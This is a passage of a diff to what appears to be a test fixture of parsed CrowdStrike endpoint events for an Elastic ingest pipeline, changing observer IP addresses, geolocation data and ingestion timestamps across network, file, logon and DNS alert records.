"2021-12-09T13:36:11.151244100Z", + "original": "{\"AuthenticationId\":\"895027\",\"ConfigBuild\":\"1007.3.0011603.1\",\"ConfigStateHash\":\"3338885535\",\"ContextProcessId\":\"1786917081743\",\"ContextThreadId\":\"31685015444484\",\"ContextTimeStamp\":\"1604855317.892\",\"EffectiveTransmissionClass\":\"3\",\"Entitlements\":\"15\",\"FileEcpBitmask\":\"0\",\"FileIdentifier\":\"0000000000000000be341bb58bc5f1f2a24339010200510e\",\"FileObject\":\"18446636933702558240\",\"IrpFlags\":\"1028\",\"IsOnNetwork\":\"1\",\"IsOnRemovableDisk\":\"0\",\"MajorFunction\":\"18\",\"MinorFunction\":\"0\",\"OperationFlags\":\"0\",\"Size\":\"223989\",\"TargetFileName\":\"\\\\Device\\\\Mup\\\\intranet.dev\\\\int\\\\Test.pptx\",\"TokenType\":\"1\",\"aid\":\"fffffffffa474d216472f3edb73c75ed\",\"aip\":\"67.43.156.13\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Win\",\"event_simpleName\":\"OoxmlFileWritten\",\"id\":\"ffffffff-1111-11eb-9165-067ee18a7975\",\"name\":\"OoxmlFileWrittenV11\",\"timestamp\":\"1604855329571\"}", "created": "2020-11-08T17:08:49.571Z", "kind": "event", "action": "OoxmlFileWritten", @@ -9505,9 +8350,24 @@ "ip": "0:0:0:0:0:0:0:0" }, "source": { + "geo": { + "continent_name": "Europe", + "country_name": "Denmark", + "location": { + "lon": 10.0, + "lat": 56.0 + }, + "country_iso_code": "DK" + }, + "as": { + "number": 62121, + "organization": { + "name": "Christian Ebsen ApS" + } + }, + "address": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6", "port": 50373, - "address": "a93:432:ffff:0:c830:b4bf:1e0:ffff", - "ip": "a93:432:ffff:0:c830:b4bf:1e0:ffff" + "ip": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" }, "url": { "scheme": "http" @@ -9521,21 +8381,12 @@ "direction": "unknown" }, "observer": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "208.222.208.124", - "vendor": "crowdstrike", - "ip": "208.222.208.124", "serial_number": "ffffffff1f924e228a807ea4c0f21b0b", + "address": "67.43.156.14", "type": "agent", - "version": "1007.3.0011603.1" + "version": "1007.3.0011603.1", + "vendor": "crowdstrike", + "ip": "67.43.156.14" }, "@timestamp": "2020-11-08T17:09:11.158Z", "ecs": { @@ -9543,22 +8394,22 @@ }, "related": { "hosts": [ - "208.222.208.124", - "a93:432:ffff:0:c830:b4bf:1e0:ffff", + "67.43.156.14", + "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6", "0:0:0:0:0:0:0:0" ], "hash": [ "3765958535" ], "ip": [ - "208.222.208.124", - "a93:432:ffff:0:c830:b4bf:1e0:ffff", + "67.43.156.14", + "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6", "0:0:0:0:0:0:0:0" ] }, "event": { - "ingested": "2021-11-22T09:23:55.466153400Z", - "original": "{\"ConfigBuild\":\"1007.3.0011603.1\",\"ConfigStateHash\":\"3765958535\",\"ConnectionDirection\":\"2\",\"ConnectionFlags\":\"0\",\"ContextProcessId\":\"439029805661\",\"ContextThreadId\":\"273683743193497\",\"ContextTimeStamp\":\"1604855351.158\",\"EffectiveTransmissionClass\":\"3\",\"Entitlements\":\"15\",\"InContext\":\"0\",\"LocalAddressIP6\":\"a93:432:ffff:0:c830:b4bf:1e0:ffff\",\"LocalPort\":\"50373\",\"Protocol\":\"6\",\"RemoteAddressIP6\":\"0:0:0:0:0:0:0:0\",\"RemotePort\":\"0\",\"aid\":\"ffffffff1f924e228a807ea4c0f21b0b\",\"aip\":\"208.222.208.124\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Win\",\"event_simpleName\":\"NetworkListenIP6\",\"id\":\"ffffffff-1111-11eb-85f5-02ab029194b9\",\"name\":\"NetworkListenIP6V5\",\"timestamp\":\"1604855351798\"}", + "ingested": "2021-12-09T13:36:11.151250400Z", + "original": "{\"ConfigBuild\":\"1007.3.0011603.1\",\"ConfigStateHash\":\"3765958535\",\"ConnectionDirection\":\"2\",\"ConnectionFlags\":\"0\",\"ContextProcessId\":\"439029805661\",\"ContextThreadId\":\"273683743193497\",\"ContextTimeStamp\":\"1604855351.158\",\"EffectiveTransmissionClass\":\"3\",\"Entitlements\":\"15\",\"InContext\":\"0\",\"LocalAddressIP6\":\"2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6\",\"LocalPort\":\"50373\",\"Protocol\":\"6\",\"RemoteAddressIP6\":\"0:0:0:0:0:0:0:0\",\"RemotePort\":\"0\",\"aid\":\"ffffffff1f924e228a807ea4c0f21b0b\",\"aip\":\"67.43.156.14\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Win\",\"event_simpleName\":\"NetworkListenIP6\",\"id\":\"ffffffff-1111-11eb-85f5-02ab029194b9\",\"name\":\"NetworkListenIP6V5\",\"timestamp\":\"1604855351798\"}", "created": "2020-11-08T17:09:11.798Z", "kind": "event", "action": "NetworkListenIP6", @@ -9598,24 +8449,12 @@ "preserve_original_event" ], "observer": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-IA", - "city_name": "Urbandale", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Iowa", - "location": { - "lon": -93.7255, - "lat": 41.6289 - } - }, - "address": "208.69.144.69", - "vendor": "crowdstrike", - "ip": "208.69.144.69", "serial_number": "ffffffff1f32487185fcde66a9dc0528", + "address": "67.43.156.14", "type": "agent", - "version": "1007.4.0011104.1" + "version": "1007.4.0011104.1", + "vendor": "crowdstrike", + "ip": "67.43.156.14" }, "@timestamp": "2020-11-08T14:34:30.744Z", "file": { @@ -9633,19 +8472,19 @@ }, "related": { "hosts": [ - "208.69.144.69" + "67.43.156.14" ], "hash": [ "e1bed7598ffdecf63a4d240f8309b528fc45068c6cb8137a5090f3afeb57f29d", "1457965279" ], "ip": [ - "208.69.144.69" + "67.43.156.14" ] }, "event": { - "ingested": "2021-11-22T09:23:55.466276400Z", - "original": "{\"ConfigBuild\":\"1007.4.0011104.1\",\"ConfigStateHash\":\"1457965279\",\"ContextProcessId\":\"321365562189152025\",\"ContextThreadId\":\"0\",\"ContextTimeStamp\":\"1604846070.744\",\"Entitlements\":\"15\",\"SHA256HashData\":\"e1bed7598ffdecf63a4d240f8309b528fc45068c6cb8137a5090f3afeb57f29d\",\"Size\":\"29646\",\"TargetFileName\":\"/System/Library/CoreServices/SecurityAgentPlugins/HomeDirMechanism.bundle/Contents/MacOS/HomeDirMechanism/..namedfork/rsrc\",\"VnodeModificationType\":\"10\",\"aid\":\"ffffffff1f32487185fcde66a9dc0528\",\"aip\":\"208.69.144.69\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Mac\",\"event_simpleName\":\"AsepFileChange\",\"id\":\"ffffffff-1111-11eb-b9b4-063e98f9b19b\",\"name\":\"AsepFileChangeMacV2\",\"timestamp\":\"1604855355495\"}", + "ingested": "2021-12-09T13:36:11.151256800Z", + "original": "{\"ConfigBuild\":\"1007.4.0011104.1\",\"ConfigStateHash\":\"1457965279\",\"ContextProcessId\":\"321365562189152025\",\"ContextThreadId\":\"0\",\"ContextTimeStamp\":\"1604846070.744\",\"Entitlements\":\"15\",\"SHA256HashData\":\"e1bed7598ffdecf63a4d240f8309b528fc45068c6cb8137a5090f3afeb57f29d\",\"Size\":\"29646\",\"TargetFileName\":\"/System/Library/CoreServices/SecurityAgentPlugins/HomeDirMechanism.bundle/Contents/MacOS/HomeDirMechanism/..namedfork/rsrc\",\"VnodeModificationType\":\"10\",\"aid\":\"ffffffff1f32487185fcde66a9dc0528\",\"aip\":\"67.43.156.14\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Mac\",\"event_simpleName\":\"AsepFileChange\",\"id\":\"ffffffff-1111-11eb-b9b4-063e98f9b19b\",\"name\":\"AsepFileChangeMacV2\",\"timestamp\":\"1604855355495\"}", "created": "2020-11-08T17:09:15.495Z", "kind": "event", "action": "AsepFileChange", @@ -9684,21 +8523,12 @@ "preserve_original_event" ], "observer": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "208.216.128.255", - "vendor": "crowdstrike", - "ip": "208.216.128.255", "serial_number": "ffffffffa5bd4efaa195a7132c576edc", + "address": "67.43.156.13", "type": "agent", - "version": "1007.3.0011603.1" + "version": "1007.3.0011603.1", + "vendor": "crowdstrike", + "ip": "67.43.156.13" }, "@timestamp": "2020-11-08T17:06:31.803Z", "ecs": { @@ -9709,18 +8539,18 @@ "user7" ], "hosts": [ - "208.216.128.255" + "67.43.156.13" ], "hash": [ "3011122681" ], "ip": [ - "208.216.128.255" + "67.43.156.13" ] }, "event": { - "ingested": "2021-11-22T09:23:55.466283800Z", - "original": "{\"ConfigBuild\":\"1007.3.0011603.1\",\"ConfigStateHash\":\"3011122681\",\"ContextProcessId\":\"2932136\",\"ContextThreadId\":\"36157339485804\",\"ContextTimeStamp\":\"1604855191.803\",\"EffectiveTransmissionClass\":\"2\",\"Entitlements\":\"15\",\"LogonTime\":\"\",\"PasswordLastSet\":\"\",\"UserLogonFlags\":\"1\",\"UserName\":\"user7\",\"UserSid\":\"S-1-5-10\",\"aid\":\"ffffffffa5bd4efaa195a7132c576edc\",\"aip\":\"208.216.128.255\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Win\",\"event_simpleName\":\"UserLogonFailed\",\"id\":\"ffffffff-1111-11eb-aa5a-0207e26418af\",\"name\":\"UserLogonFailedV1\",\"timestamp\":\"1604855193422\"}", + "ingested": "2021-12-09T13:36:11.151263100Z", + "original": "{\"ConfigBuild\":\"1007.3.0011603.1\",\"ConfigStateHash\":\"3011122681\",\"ContextProcessId\":\"2932136\",\"ContextThreadId\":\"36157339485804\",\"ContextTimeStamp\":\"1604855191.803\",\"EffectiveTransmissionClass\":\"2\",\"Entitlements\":\"15\",\"LogonTime\":\"\",\"PasswordLastSet\":\"\",\"UserLogonFlags\":\"1\",\"UserName\":\"user7\",\"UserSid\":\"S-1-5-10\",\"aid\":\"ffffffffa5bd4efaa195a7132c576edc\",\"aip\":\"67.43.156.13\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Win\",\"event_simpleName\":\"UserLogonFailed\",\"id\":\"ffffffff-1111-11eb-aa5a-0207e26418af\",\"name\":\"UserLogonFailedV1\",\"timestamp\":\"1604855193422\"}", "created": "2020-11-08T17:06:33.422Z", "kind": "event", "action": "UserLogonFailed", @@ -9754,14 +8584,44 @@ "type": "windows" }, "destination": { + "geo": { + "continent_name": "Europe", + "country_name": "Denmark", + "location": { + "lon": 10.0, + "lat": 56.0 + }, + "country_iso_code": "DK" + }, + "as": { + "number": 62121, + "organization": { + "name": "Christian Ebsen ApS" + } + }, + "address": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6", "port": 443, - "address": "2a00:ffff:11:809:0:0:0:200e", - "ip": "2a00:ffff:11:809:0:0:0:200e" + "ip": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" }, "source": { + "geo": { + "continent_name": "Europe", + "country_name": "Denmark", + "location": { + "lon": 10.0, + "lat": 56.0 + }, + "country_iso_code": "DK" + }, + "as": { + "number": 62121, + "organization": { + "name": "Christian Ebsen ApS" + } + }, + "address": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6", "port": 49689, - "address": "2a02:ffff:11:8000:d140:da90:aa7a:62a5", - "ip": "2a02:ffff:11:8000:d140:da90:aa7a:62a5" + "ip": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" }, "url": { "scheme": "http" @@ -9770,30 +8630,18 @@ "preserve_original_event" ], "network": { - "community_id": "1:S6FobcKkFbNEh4m1AggfMMgitX4=", + "community_id": "1:H+oCOL0YBAZDUBNuLG0b/Xuke3g=", "transport": "tcp", "iana_number": "6", "direction": "outbound" }, "observer": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-OH", - "city_name": "Willoughby", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Ohio", - "location": { - "lon": -81.4034, - "lat": 41.6325 - } - }, - "address": "208.68.193.187", - "vendor": "crowdstrike", - "ip": "208.68.193.187", "serial_number": "ffffffff6854438eb4181691ec47e43d", + "address": "67.43.156.14", "type": "agent", - "version": "1007.3.0011603.1" + "version": "1007.3.0011603.1", + "vendor": "crowdstrike", + "ip": "67.43.156.14" }, "@timestamp": "2020-11-08T17:05:36.669Z", "ecs": { @@ -9801,22 +8649,20 @@ }, "related": { "hosts": [ - "208.68.193.187", - "2a02:ffff:11:8000:d140:da90:aa7a:62a5", - "2a00:ffff:11:809:0:0:0:200e" + "67.43.156.14", + "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" ], "hash": [ "1858880895" ], "ip": [ - "208.68.193.187", - "2a02:ffff:11:8000:d140:da90:aa7a:62a5", - "2a00:ffff:11:809:0:0:0:200e" + "67.43.156.14", + "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" ] }, "event": { - "ingested": "2021-11-22T09:23:55.466290600Z", - "original": "{\"ConfigBuild\":\"1007.3.0011603.1\",\"ConfigStateHash\":\"1858880895\",\"ConnectionDirection\":\"0\",\"ConnectionFlags\":\"0\",\"ContextProcessId\":\"56042872298\",\"ContextTimeStamp\":\"1604855136.669\",\"EffectiveTransmissionClass\":\"3\",\"Entitlements\":\"15\",\"InContext\":\"0\",\"LocalAddressIP6\":\"2a02:ffff:11:8000:d140:da90:aa7a:62a5\",\"LocalPort\":\"49689\",\"Protocol\":\"6\",\"RemoteAddressIP6\":\"2a00:ffff:11:809:0:0:0:200e\",\"RemotePort\":\"443\",\"aid\":\"ffffffff6854438eb4181691ec47e43d\",\"aip\":\"208.68.193.187\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Win\",\"event_simpleName\":\"NetworkConnectIP6\",\"id\":\"ffffffff-1111-11eb-a889-061944805289\",\"name\":\"NetworkConnectIP6V5\",\"timestamp\":\"1604855199798\"}", + "ingested": "2021-12-09T13:36:11.151269500Z", + "original": "{\"ConfigBuild\":\"1007.3.0011603.1\",\"ConfigStateHash\":\"1858880895\",\"ConnectionDirection\":\"0\",\"ConnectionFlags\":\"0\",\"ContextProcessId\":\"56042872298\",\"ContextTimeStamp\":\"1604855136.669\",\"EffectiveTransmissionClass\":\"3\",\"Entitlements\":\"15\",\"InContext\":\"0\",\"LocalAddressIP6\":\"2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6\",\"LocalPort\":\"49689\",\"Protocol\":\"6\",\"RemoteAddressIP6\":\"2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6\",\"RemotePort\":\"443\",\"aid\":\"ffffffff6854438eb4181691ec47e43d\",\"aip\":\"67.43.156.14\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Win\",\"event_simpleName\":\"NetworkConnectIP6\",\"id\":\"ffffffff-1111-11eb-a889-061944805289\",\"name\":\"NetworkConnectIP6V5\",\"timestamp\":\"1604855199798\"}", "created": "2020-11-08T17:06:39.798Z", "kind": "event", "action": "NetworkConnectIP6", @@ -9857,21 +8703,12 @@ "preserve_original_event" ], "observer": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "208.213.180.70", - "vendor": "crowdstrike", - "ip": "208.213.180.70", "serial_number": "ffffffffc07b49d6b7426e970523671a", + "address": "67.43.156.14", "type": "agent", - "version": "1007.4.0011104.1" + "version": "1007.4.0011104.1", + "vendor": "crowdstrike", + "ip": "67.43.156.14" }, "@timestamp": "2020-11-08T16:42:35.987Z", "file": { @@ -9890,19 +8727,19 @@ }, "related": { "hosts": [ - "208.213.180.70" + "67.43.156.14" ], "hash": [ "fa07e991e0c3f3661794bba39061433265162b10cd9036751941cc45e6a4b583", "1789338890" ], "ip": [ - "208.213.180.70" + "67.43.156.14" ] }, "event": { - "ingested": "2021-11-22T09:23:55.466297600Z", - "original": "{\"ConfigBuild\":\"1007.4.0011104.1\",\"ConfigStateHash\":\"1789338890\",\"ContextProcessId\":\"321382909294815631\",\"ContextThreadId\":\"0\",\"ContextTimeStamp\":\"1604853755.987\",\"Entitlements\":\"15\",\"SHA256HashData\":\"fa07e991e0c3f3661794bba39061433265162b10cd9036751941cc45e6a4b583\",\"Size\":\"165\",\"SourceFileName\":\"/Library/Application Support/JAMF/tmp/.dat.nosync2c98.VBwjsq\",\"TargetFileName\":\"/Library/Application Support/JAMF/tmp/6B24D2B6-BC17-4470-8078-91A787A19478\",\"aid\":\"ffffffffc07b49d6b7426e970523671a\",\"aip\":\"208.213.180.70\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Mac\",\"event_simpleName\":\"NewExecutableRenamed\",\"id\":\"ffffffff-1111-11eb-8773-06939a2f0915\",\"name\":\"NewExecutableRenamedMacV1\",\"timestamp\":\"1604855213224\"}", + "ingested": "2021-12-09T13:36:11.151276300Z", + "original": "{\"ConfigBuild\":\"1007.4.0011104.1\",\"ConfigStateHash\":\"1789338890\",\"ContextProcessId\":\"321382909294815631\",\"ContextThreadId\":\"0\",\"ContextTimeStamp\":\"1604853755.987\",\"Entitlements\":\"15\",\"SHA256HashData\":\"fa07e991e0c3f3661794bba39061433265162b10cd9036751941cc45e6a4b583\",\"Size\":\"165\",\"SourceFileName\":\"/Library/Application Support/JAMF/tmp/.dat.nosync2c98.VBwjsq\",\"TargetFileName\":\"/Library/Application Support/JAMF/tmp/6B24D2B6-BC17-4470-8078-91A787A19478\",\"aid\":\"ffffffffc07b49d6b7426e970523671a\",\"aip\":\"67.43.156.14\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Mac\",\"event_simpleName\":\"NewExecutableRenamed\",\"id\":\"ffffffff-1111-11eb-8773-06939a2f0915\",\"name\":\"NewExecutableRenamedMacV1\",\"timestamp\":\"1604855213224\"}", "created": "2020-11-08T17:06:53.224Z", "kind": "event", "action": "NewExecutableRenamed", @@ -9952,21 +8789,12 @@ "direction": "outbound" }, "observer": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "208.131.50.212", - "vendor": "crowdstrike", - "ip": "208.131.50.212", "serial_number": "ffffffffa60a47af4ebd2a76070f0d4f", + "address": "67.43.156.14", "type": "agent", - "version": "1007.4.0011104.1" + "version": "1007.4.0011104.1", + "vendor": "crowdstrike", + "ip": "67.43.156.14" }, "@timestamp": "2020-11-08T17:07:48.323Z", "ecs": { @@ -9974,20 +8802,20 @@ }, "related": { "hosts": [ - "208.131.50.212", + "67.43.156.14", "0:0:0:0:0:0:0:0" ], "hash": [ "203564169" ], "ip": [ - "208.131.50.212", + "67.43.156.14", "0:0:0:0:0:0:0:0" ] }, "event": { - "ingested": "2021-11-22T09:23:55.466304400Z", - "original": "{\"ConfigBuild\":\"1007.4.0011104.1\",\"ConfigStateHash\":\"203564169\",\"ConnectionDirection\":\"0\",\"ConnectionFlags\":\"0\",\"ContextProcessId\":\"321367236803434269\",\"ContextTimeStamp\":\"1604855268.323\",\"Entitlements\":\"15\",\"InContext\":\"0\",\"LocalAddressIP6\":\"0:0:0:0:0:0:0:0\",\"LocalPort\":\"51076\",\"Protocol\":\"6\",\"RemoteAddressIP6\":\"0:0:0:0:0:0:0:0\",\"RemotePort\":\"0\",\"aid\":\"ffffffffa60a47af4ebd2a76070f0d4f\",\"aip\":\"208.131.50.212\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Mac\",\"event_simpleName\":\"NetworkListenIP6\",\"id\":\"ffffffff-1111-11eb-9a50-0669ff09604d\",\"name\":\"NetworkListenIP6MacV5\",\"timestamp\":\"1604855268755\"}", + "ingested": "2021-12-09T13:36:11.151282800Z", + "original": "{\"ConfigBuild\":\"1007.4.0011104.1\",\"ConfigStateHash\":\"203564169\",\"ConnectionDirection\":\"0\",\"ConnectionFlags\":\"0\",\"ContextProcessId\":\"321367236803434269\",\"ContextTimeStamp\":\"1604855268.323\",\"Entitlements\":\"15\",\"InContext\":\"0\",\"LocalAddressIP6\":\"0:0:0:0:0:0:0:0\",\"LocalPort\":\"51076\",\"Protocol\":\"6\",\"RemoteAddressIP6\":\"0:0:0:0:0:0:0:0\",\"RemotePort\":\"0\",\"aid\":\"ffffffffa60a47af4ebd2a76070f0d4f\",\"aip\":\"67.43.156.14\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Mac\",\"event_simpleName\":\"NetworkListenIP6\",\"id\":\"ffffffff-1111-11eb-9a50-0669ff09604d\",\"name\":\"NetworkListenIP6MacV5\",\"timestamp\":\"1604855268755\"}", "created": "2020-11-08T17:07:48.755Z", "kind": "event", "action": "NetworkListenIP6", @@ -10026,21 +8854,12 @@ "preserve_original_event" ], "observer": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "208.216.134.211", - "vendor": "crowdstrike", - "ip": "208.216.134.211", "serial_number": "ffffffff6d724d38af99c628fb904626", + "address": "67.43.156.13", "type": "agent", - "version": "1007.3.0011603.1" + "version": "1007.3.0011603.1", + "vendor": "crowdstrike", + "ip": "67.43.156.13" }, "@timestamp": "2020-11-08T17:08:00.307Z", "ecs": { @@ -10048,18 +8867,18 @@ }, "related": { "hosts": [ - "208.216.134.211" + "67.43.156.13" ], "hash": [ "3765958535" ], "ip": [ - "208.216.134.211" + "67.43.156.13" ] }, "event": { - "ingested": "2021-11-22T09:23:55.466311100Z", - "original": "{\"ConfigBuild\":\"1007.3.0011603.1\",\"ConfigStateHash\":\"3765958535\",\"ContextProcessId\":\"1611521722601\",\"ContextThreadId\":\"53405065993811\",\"ContextTimeStamp\":\"1604855280.307\",\"DomainName\":\"raw.githubusercontent.com\",\"DualRequest\":\"0\",\"EffectiveTransmissionClass\":\"3\",\"Entitlements\":\"15\",\"InterfaceIndex\":\"0\",\"RequestType\":\"1\",\"aid\":\"ffffffff6d724d38af99c628fb904626\",\"aip\":\"208.216.134.211\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Win\",\"event_simpleName\":\"SuspiciousDnsRequest\",\"id\":\"ffffffff-1111-11eb-885e-02ac336efd4b\",\"name\":\"SuspiciousDnsRequestV2\",\"timestamp\":\"1604855323217\"}", + "ingested": "2021-12-09T13:36:11.151289100Z", + "original": "{\"ConfigBuild\":\"1007.3.0011603.1\",\"ConfigStateHash\":\"3765958535\",\"ContextProcessId\":\"1611521722601\",\"ContextThreadId\":\"53405065993811\",\"ContextTimeStamp\":\"1604855280.307\",\"DomainName\":\"raw.githubusercontent.com\",\"DualRequest\":\"0\",\"EffectiveTransmissionClass\":\"3\",\"Entitlements\":\"15\",\"InterfaceIndex\":\"0\",\"RequestType\":\"1\",\"aid\":\"ffffffff6d724d38af99c628fb904626\",\"aip\":\"67.43.156.13\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Win\",\"event_simpleName\":\"SuspiciousDnsRequest\",\"id\":\"ffffffff-1111-11eb-885e-02ac336efd4b\",\"name\":\"SuspiciousDnsRequestV2\",\"timestamp\":\"1604855323217\"}", "created": "2020-11-08T17:08:43.217Z", "kind": "alert", "action": "SuspiciousDnsRequest", @@ -10101,21 +8920,12 @@ "preserve_original_event" ], "observer": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "208.216.134.193", - "vendor": "crowdstrike", - "ip": "208.216.134.193", "serial_number": "ffffffff1990483499a736373600eef7", + "address": "67.43.156.13", "type": "agent", - "version": "100.3.0011603.1" + "version": "100.3.0011603.1", + "vendor": "crowdstrike", + "ip": "67.43.156.13" }, "@timestamp": "2020-11-08T17:08:35.034Z", "file": { @@ -10126,15 +8936,15 @@ }, "related": { "hosts": [ - "208.216.134.193" + "67.43.156.13" ], "ip": [ - "208.216.134.193" + "67.43.156.13" ] }, "event": { - "ingested": "2021-11-22T09:23:55.466317900Z", - "original": "{\"ConfigBuild\":\"100.3.0011603.1\",\"ContextProcessId\":\"4492535979973\",\"ContextThreadId\":\"14023068415125\",\"ContextTimeStamp\":\"1604855315.034\",\"DiskParentDeviceInstanceId\":\"PCI\\\\VEN_8086\\u0026DEV_31E3\\u0026SUBSYS_080C1028\\u0026REV_03\\\\3\\u002611583659\\u00260\\u002690\",\"EffectiveTransmissionClass\":\"3\",\"Entitlements\":\"15\",\"VolumeDeviceCharacteristics\":\"131072\",\"VolumeDeviceObjectFlags\":\"134479872\",\"VolumeDeviceType\":\"8\",\"VolumeDriveLetter\":\"C:\",\"VolumeFileSystemDevice\":\"\\\\Ntfs\",\"VolumeFileSystemDriver\":\"\\\\FileSystem\\\\Ntfs\",\"VolumeFileSystemType\":\"2\",\"VolumeIsEncrypted\":\"0\",\"VolumeMountPoint\":\"\\\\??\\\\Volume{9b46da3f-ce44-432f-9230-c9201504bfd7}\",\"VolumeName\":\"\\\\Device\\\\HarddiskVolume4\",\"VolumeRealDeviceName\":\"\\\\Device\\\\HarddiskVolume4\",\"VolumeSectorSize\":\"512\",\"aid\":\"ffffffff1990483499a736373600eef7\",\"aip\":\"208.216.134.193\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Win\",\"event_simpleName\":\"FsVolumeMounted\",\"id\":\"ffffffff-1111-11eb-9be9-024459b713c5\",\"name\":\"FsVolumeMountedV6\",\"timestamp\":\"1604855329102\"}", + "ingested": "2021-12-09T13:36:11.151295300Z", + "original": "{\"ConfigBuild\":\"100.3.0011603.1\",\"ContextProcessId\":\"4492535979973\",\"ContextThreadId\":\"14023068415125\",\"ContextTimeStamp\":\"1604855315.034\",\"DiskParentDeviceInstanceId\":\"PCI\\\\VEN_8086\\u0026DEV_31E3\\u0026SUBSYS_080C1028\\u0026REV_03\\\\3\\u002611583659\\u00260\\u002690\",\"EffectiveTransmissionClass\":\"3\",\"Entitlements\":\"15\",\"VolumeDeviceCharacteristics\":\"131072\",\"VolumeDeviceObjectFlags\":\"134479872\",\"VolumeDeviceType\":\"8\",\"VolumeDriveLetter\":\"C:\",\"VolumeFileSystemDevice\":\"\\\\Ntfs\",\"VolumeFileSystemDriver\":\"\\\\FileSystem\\\\Ntfs\",\"VolumeFileSystemType\":\"2\",\"VolumeIsEncrypted\":\"0\",\"VolumeMountPoint\":\"\\\\??\\\\Volume{9b46da3f-ce44-432f-9230-c9201504bfd7}\",\"VolumeName\":\"\\\\Device\\\\HarddiskVolume4\",\"VolumeRealDeviceName\":\"\\\\Device\\\\HarddiskVolume4\",\"VolumeSectorSize\":\"512\",\"aid\":\"ffffffff1990483499a736373600eef7\",\"aip\":\"67.43.156.13\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Win\",\"event_simpleName\":\"FsVolumeMounted\",\"id\":\"ffffffff-1111-11eb-9be9-024459b713c5\",\"name\":\"FsVolumeMountedV6\",\"timestamp\":\"1604855329102\"}", "created": "2020-11-08T17:08:49.102Z", "kind": "event", "action": "FsVolumeMounted", @@ -10195,21 +9005,12 @@ "direction": "outbound" }, "observer": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "208.71.20.13", - "vendor": "crowdstrike", - "ip": "208.71.20.13", "serial_number": "ffffffffe5ff467b4f0c4fd41a4462bb", + "address": "67.43.156.14", "type": "agent", - "version": "1007.4.0011104.1" + "version": "1007.4.0011104.1", + "vendor": "crowdstrike", + "ip": "67.43.156.14" }, "@timestamp": "2020-11-08T17:05:27.011Z", "ecs": { @@ -10217,7 +9018,7 @@ }, "related": { "hosts": [ - "208.71.20.13", + "67.43.156.14", "127.0.0.1", "0.0.0.0" ], @@ -10225,14 +9026,14 @@ "1789338890" ], "ip": [ - "208.71.20.13", + "67.43.156.14", "127.0.0.1", "0.0.0.0" ] }, "event": { - "ingested": "2021-11-22T09:23:55.466324800Z", - "original": "{\"ConfigBuild\":\"1007.4.0011104.1\",\"ConfigStateHash\":\"1789338890\",\"ConnectionDirection\":\"0\",\"ConnectionFlags\":\"0\",\"ContextProcessId\":\"321210562584146513\",\"ContextTimeStamp\":\"1604855127.011\",\"Entitlements\":\"15\",\"InContext\":\"0\",\"LocalAddressIP4\":\"127.0.0.1\",\"LocalPort\":\"53\",\"Protocol\":\"6\",\"RemoteAddressIP4\":\"0.0.0.0\",\"RemotePort\":\"0\",\"aid\":\"ffffffffe5ff467b4f0c4fd41a4462bb\",\"aip\":\"208.71.20.13\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Mac\",\"event_simpleName\":\"NetworkListenIP4\",\"id\":\"ffffffff-1111-11eb-ae74-065212970c5d\",\"name\":\"NetworkListenIP4MacV5\",\"timestamp\":\"1604855128936\"}", + "ingested": "2021-12-09T13:36:11.151301600Z", + "original": 